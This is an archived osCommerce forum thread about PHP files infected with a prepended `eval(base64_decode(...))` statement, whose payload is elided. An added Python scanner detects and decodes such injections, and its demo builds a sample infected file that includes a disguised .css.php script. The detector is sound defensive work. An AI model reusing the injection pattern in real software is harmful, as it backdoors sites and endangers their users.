Guest Posted September 18, 2009

I really hope someone can help me with this. All of my php files have new code added to the top. I did not put it there, and my host says it is not from them. I am going through every file now to remove it. Can someone tell me what it is or how I got it? Also, will someone please confirm that this is not part of the OSC code? The code is base64 run in php script and is as follows: /**/eval(base64_decode('…'));
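A scan for the injected statement described in the first post, as an added example that is not part of the original thread or of osCommerce: it finds `.php` files containing the `/**/eval(base64_decode(` statement, decodes the blob to text without executing it, and lists the file paths the decoded code refers to. The sample files and the `/constructed/...` path are constructed for the demonstration.

```python
import base64
import re
import tempfile
from pathlib import Path

# The injected statement as posted: /**/eval(base64_decode('<blob>'));
# Whitespace inside the blob is tolerated because pasted copies often wrap.
INJECTED = re.compile(
    r"/\*\*/\s*eval\(\s*base64_decode\(\s*'([A-Za-z0-9+/=\s]+)'\s*\)\s*\)\s*;")
# Paths the decoded code tests or includes point at a second file to inspect.
REFERENCED = re.compile(r"(?:include_once|file_exists)\(\s*'([^']+)'")


def inspect_source(text):
    """Return (text without the injected statement, decoded payloads); nothing is executed."""
    payloads = []
    for blob in INJECTED.findall(text):
        try:
            raw = base64.b64decode("".join(blob.split()))
            payloads.append(raw.decode("latin-1"))
        except ValueError:  # binascii.Error: damaged blob, still report the file
            payloads.append("")
    return INJECTED.sub("", text), payloads


def scan_tree(root):
    """Map each infected .php file under root to the paths its payload names."""
    findings = {}
    for path in sorted(Path(root).rglob("*.php")):
        _, payloads = inspect_source(path.read_text(encoding="latin-1"))
        if payloads:
            refs = {r for p in payloads for r in REFERENCED.findall(p)}
            findings[path.relative_to(root).as_posix()] = sorted(refs)
    return findings


def demo():
    """Scan a constructed two-file tree; returns (findings, cleaned source)."""
    inner = "if(file_exists('/constructed/lang/style.css.php')){include_once('/constructed/lang/style.css.php');}"
    blob = base64.b64encode(inner.encode()).decode()
    infected = "<?php /**/eval(base64_decode('%s')); ?><?php\necho 'catalog';\n" % blob
    with tempfile.TemporaryDirectory() as root:
        Path(root, "index.php").write_text(infected, encoding="latin-1")
        Path(root, "clean.php").write_text("<?php echo 'ok';\n", encoding="latin-1")
        return scan_tree(root), inspect_source(infected)[0]


if __name__ == "__main__":
    print(demo()[0])
```

Any path the scan reports is a file to inspect as well, and restoring from a known-clean backup is safer than trusting the stripped text.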
web-project Posted September 18, 2009

No it's not part of oscommerce, this encrypted code.

Please read this line: Do you want to find all the answers to your questions? click here. As for contribution database it's located here! 8 people out of 10 don't bother to read installation manuals. I can recommend: if you can't read the installation manual, don't bother to install any contribution yourself. Before installing contribution or editing/updating/deleting any files, do the full backup, it will save to you & everyone here on the forum time to fix your issues. Any issues with oscommerce, I am here to help you.
web-project Posted September 18, 2009

you can try this URL to decode the code, as above code is invalid: http://ostermiller.org/calc/encode.html
Guest Posted September 18, 2009

> you can try this URL to decode the code, as above code is invalid: http://ostermiller.org/calc/encode.html

I tried decoding it earlier, the one I used was marginally successful in decoding it, but only partially. I couldn't see anything in it that was indicative of what it was. It's very frustrating not knowing how this happened or what it was for.
knifeman Posted September 18, 2009

> I tried decoding it earlier, the one I used was marginally successful in decoding it, but only partially. I couldn't see anything in it that was indicative of what it was. It's very frustrating not knowing how this happened or what it was for.

There is currently a 4 page thread on this hack: Thread
Guest Posted September 18, 2009

> There is currently a 4 page thread on this hack: Thread

Thank you SO MUCH! That was very helpful. This has convinced me EVERYONE should change their admin folder to a different name and password protect it.
rednme Posted September 19, 2009

Just help fellow oscommerce users. There is a lot more than just changing admin folder names and file names. It was mentioned in so many places that there are other security measures that we all have to take. Hackers are at all different levels. I recommend all to take a serious look at the security recommendations from this forum (somewhere :) sorry, can't give you a link here, please do a search). One of the things that many forget is to back up a clean copy of your working current site scripts. When you update files, immediately make a clean backup of the entire site scripts. The database is also a must-do daily, with the date in the file name. Hope it helps.
Guest Posted September 20, 2009

> Just help fellow oscommerce users. There is a lot more than just changing admin folder names and file names. It was mentioned in so many places that there are other security measures that we all have to take. Hackers are at all different levels. I recommend all to take a serious look at the security recommendations from this forum (somewhere :) sorry, can't give you a link here, please do a search). One of the things that many forget is to back up a clean copy of your working current site scripts. When you update files, immediately make a clean backup of the entire site scripts. The database is also a must-do daily, with the date in the file name. Hope it helps.

Definitely! I have done many of the security measures before, but I think people get complacent once they have been running for a while with no problems. This particular issue was given access through OSC's file manager, so I deleted it and recommend everyone else do the same! I am going to make sure that I keep up to date on the new security issues as they become known.
swguy Posted September 20, 2009

I wrote a mod that automates these checks for you - take a look at http://addons.oscommerce.com/info/7026

Contributions: Better Together and Quantity Discounts for osCommerce 2.3.x and Phoenix. See my profile for more details.
Archived
This topic is now archived and is closed to further replies.